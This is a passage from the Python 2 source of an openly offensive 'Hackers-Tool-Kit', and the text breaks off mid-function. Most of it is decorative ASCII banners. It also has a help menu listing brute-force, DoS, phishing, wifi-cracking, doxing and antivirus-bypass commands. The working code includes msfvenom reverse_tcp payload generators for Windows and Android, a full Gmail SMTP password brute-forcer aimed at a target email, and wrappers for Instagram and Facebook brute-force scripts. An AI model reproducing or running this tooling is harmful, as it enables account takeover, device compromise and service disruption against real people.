|\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + .---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,17) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (info gathering tool) +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + 